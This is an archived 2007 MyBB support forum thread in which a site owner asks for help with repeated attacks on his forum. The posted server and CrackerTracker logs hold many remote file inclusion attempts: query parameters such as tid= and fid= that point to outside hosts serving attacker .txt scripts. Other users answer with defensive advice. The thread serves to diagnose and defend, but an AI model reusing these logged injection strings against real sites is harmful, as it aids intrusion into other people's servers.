MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.2 Series > MyBB 1.2 General Support > The problem of locked MySQL
Full Version: The problem of locked MySQL
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

adigec

2007-11-24, 01:18 PM
Hello Friends,

My problem is that sometimes my forum is locked. I close it from ftp and wait a little bit, then reset the server; so it is alright. I talked about this problem with my host company and learn that it is because someone attacks the forum or the overuse of SQL of MySQL, then this locks the forum. That is why I install Cracker Tracker with adding those files:

When I look at “who is Online” part and want to know where the visitors are, it says they are in the Unknown zone, then when I click on them to know where they are, the address below is shown.

I guess those two cases are not the coincidence. They are the causes of my problem. If it is so, what do you advice me to do?

Thanks all

logfile_debug_mode.txt (the content of the file is given below)
Request-Method: GET
Query String: tid=http://amygirl.chat.ru/images/image.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/printthread.php
----------------

Request-Method: GET
Query String: tid=http://amygirl.chat.ru/images/image.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/printthread.php
----------------

Request-Method: GET
Query String: tid=http%3a%2f%2fwww.parasolmusic.com%2fpanel%2fphpmyadmin%2fimages%2f.data%2fcihalil%2fhabin%2f

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/showthread.php
----------------

Request-Method: GET
Query String: mode=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/member.php
----------------

Request-Method: GET
Query String: action=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------

Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------

Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------

Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------

Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/showthread.php
----------------

Request-Method: GET
Query String: tid=http://amymusicgirl.h17.ru/mysong.txt?

# EoM

logfile_injects.txt (the content of the file is given below)
CrackerTracker - A Protection System from http://www.cback.de
2007-11-22, 15:26:24, 1195745184, 70.52.96.200, tid=http:amygirl.chat.ruimagesimage.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-22, 15:37:06, 1195745826, 70.52.96.200, tid=http:amygirl.chat.ruimagesimage.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-22, 18:55:01, 1195757701, 217.144.201.107, tid=http%3a%2f%2fwww.parasolmusic.com%2fpanel%2fphpmyadmin%2fimages%2f.data%2fcihalil%2fhabin%2f, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
2007-11-24, 04:22:52, 1195878172, 69.159.161.19, mode=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 05:36:21, 1195882581, 70.52.219.158, action=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 06:04:34, 1195884274, 207.112.41.3, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 06:41:10, 1195886470, 67.100.55.223, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 06:41:53, 1195886513, 67.100.55.223, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 07:22:32, 1195888952, 65.93.182.201, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 08:12:52, 1195891972, 78.146.199.238, tid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)

adigec

2007-11-24, 03:41 PM
when I search for phpmyadminden amymusicgirl, I see the results on mybb_sessions chart mentioned below

Ryan Gordon

2007-11-24, 05:12 PM
both tid, fid, and uid are intval'ed in inc/class_core.php, so they're very secure. So trust me when I say that's not causing it

adigec

2007-11-24, 08:28 PM
Thanks Tikitiki...
Is there anyone who can advice me something to get rid og this problem. My forum is closed because of that problem. I need to know how to overcome that problem.

adigec

2007-11-25, 06:17 PM
Hi Friends,
Someone is attacking constatnly; and I need a help immediately.

User 2877

2007-11-25, 08:44 PM
DDOS is best stopped at server level. Firewall preventention or htaccess changes should be your goal. I see multiple IP addresses...is there hundreds or just dozens? If it's possible find the ones with the most requests and drop the packets completely.

adigec

2007-11-25, 09:07 PM
As the attacks are done with numerous ip adresses, it does not work athough I have banned many of them.

Dennis Tsang

2007-11-25, 10:38 PM
I suggest you try "Bad Behavior" to block these bots. There's no direct port for MyBB, but I think you can try downloading this: http://www.bad-behavior.ioerror.us/download/

Read the docs here for "Other Systems"
http://www.homelandstupidity.us/software...-behavior/

I think you just need to put that require... statement in global.php.

Lapsetur

2007-11-26, 11:23 AM
Can it be possible to clean all the "fid=http:amymusicgirl.h17.rumysong.txt?," stuff from SQL there may be an uploaded jpg or something like that to reach the SQL Quiry

Dennis Tsang

2007-11-27, 02:48 AM
Lapsetur Wrote:Can it be possible to clean all the "fid=http:amymusicgirl.h17.rumysong.txt?," stuff from SQL there may be an uploaded jpg or something like that to reach the SQL Quiry

Sorry I don't understand what you mean. MyBB already filters out the fid from the URL and only allows integers (numbers)
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.2 Series > MyBB 1.2 General Support > The problem of locked MySQL